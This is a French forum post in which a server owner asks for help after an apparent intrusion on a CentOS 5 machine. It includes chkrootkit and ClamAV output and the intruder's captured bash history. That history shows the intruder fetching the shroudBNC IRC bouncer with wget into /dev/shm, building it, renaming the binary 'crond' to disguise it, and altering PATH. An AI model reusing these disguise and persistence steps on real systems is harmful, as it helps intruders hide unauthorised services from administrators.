Suspicion hacking plus que certaine
Bonjour !
@noob inside !!
un petit malin (bien plus que moi vu je n'y connais rien) a très certainement pénétré mon petit serveur linux (Centos5).
petit historique :
Chkroot kit a ajouté cela à ses logs :
Code:
1 2 3 4 5 6 7 8 9 10 11 12 13
| Warning: `//root/.bash_history
//home/.bash_history
//var/html/.bash_history' file size is zero
INFECTED (PORTS: 465)
The tty of the following user process(es) were not found
in /var/run/utmp !
! root 3921 tty1 /sbin/mingetty tty1
! root 3922 tty2 /sbin/mingetty tty2
! root 3925 tty3 /sbin/mingetty tty3
! root 3928 tty4 /sbin/mingetty tty4
! root 3929 tty5 /sbin/mingetty tty5
! root 3930 tty6 /sbin/mingetty tty6
! root 13082 pts/1 /bin/bash |
clamav ne veut plus logger correctement depuis vendredi; mail d'alerte :
Code:
1 2 3 4 5 6 7 8 9 10
| /etc/cron.hourly/freshclam:
ERROR: Can't open /var/log/clamav/freshclam.log in append mode (check permissions!).
/etc/cron.hourly/inn-cron-nntpsend:
cannot determine current run level
/etc/cron.hourly/inn-cron-rnews:
cannot determine current run level
/etc/cron.hourly/mcelog: |
et un chkrootkit -x lkm me donne :
Citation:
ROOTDIR is `/'
find: WARNING: Hard link count is wrong for /proc/1: this may be a bug in your f ilesystem driver. Automatically turning on find's -noleaf option. Earlier resu lts may have failed to include directories that should have been searched.
###
### Output of: ./chkproc -v -v -p 3
###
CWD 11859: /
EXE 11859: /usr/local/psa/admin/bin/modules/watchdog/monit
CWD 13185: /var/lib/mysql
EXE 13185: /usr/libexec/mysqld
CWD 13186: /var/lib/mysql
EXE 13186: /usr/libexec/mysqld
CWD 13187: /var/lib/mysql
EXE 13187: /usr/libexec/mysqld
CWD 13188: /var/lib/mysql
EXE 13188: /usr/libexec/mysqld
CWD 13193: /var/lib/mysql
EXE 13193: /usr/libexec/mysqld
CWD 13194: /var/lib/mysql
EXE 13194: /usr/libexec/mysqld
CWD 13195: /var/lib/mysql
EXE 13195: /usr/libexec/mysqld
CWD 13196: /var/lib/mysql
EXE 13196: /usr/libexec/mysqld
CWD 13240: /home/dumas/ /sbnc
EXE 13240: /home/dumas/ /sbnc/bin/sbnc
CWD 13771: /var/lib/mysql
EXE 13771: /usr/libexec/mysqld
CWD 28578: /var/named/run-root/var
EXE 28578: /usr/sbin/named
CWD 28579: /var/named/run-root/var
EXE 28579: /usr/sbin/named
CWD 28580: /var/named/run-root/var
EXE 28580: /usr/sbin/named
CWD 28581: /var/named/run-root/var
EXE 28581: /usr/sbin/named
CWD 28962: /
EXE 28962: /usr/sbin/automount
CWD 28963: /
EXE 28963: /usr/sbin/automount
CWD 28966: /
EXE 28966: /usr/sbin/automount
CWD 28969: /
EXE 28969: /usr/sbin/automount
CWD 29323: /
EXE 29323: /sbin/auditd
CWD 29325: /
EXE 29325: /sbin/audispd
CWD 29816: /
EXE 29816: /usr/sbin/pcscd
ce Dumas viens d’apparaître sur mon système dans /home/dumas/ avec ce .bash_history :
Code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96
| cd /dev/shm
w
ps x
cd /dev/shm
ls -as
cd sbnc-1.3beta6
cd src
ls -as
mv cron sbnc
./sbnc
./sbnc
ps x
kill -9 30017
./sbnc
kill -9 30017
ps x
kill -9 30110
mv sbnc crond
PATH=:$PATH
crond
ps x
cd /dev/shm
ls -as
cd " . "
ls -as
cd sbnc-1.3beta6
make
cd /home
las -as
ls -as
cd /dev/shm
ls -as
wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz
tar zxvf sbnc-1.3beta6.tar.gz
cd sbnc-1.3beta6
ls -sd
ls -as
./configure
make
make install
ls -as
cd src
ls -as
ps x
mv sbnc cron
PATH=:$PATH
crond
ps x
kill -9 30124
cd /dev/shm
ls -as
rm -rf *
cd
wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz
tar zxvf sbnc-1.3beta6.tar.gz
rm -rf sbnc-1.3beta6.tar.gz
cd sbnc-1.3beta6
ls -as
./configure
./configure*
chmod +x *
make
./make insall
/make install
./make
make install
ls -as
cd php
ls -as
cd src
ls -as
cd ..
cd src
ls .as
ls -as
./sbnc
ps x
kill -9 11764
cd ..
ls -as
cd ..
ls -as
cd sbnc
ls -as
./sbnc
./sbnc
ls -as
ps x
kill -9 12718
mv sbnc crond
PATH=:$PATH
crond
w
last
ps x
kill -9 30461 16431 3356 |
help !!! là je suis en sueurs...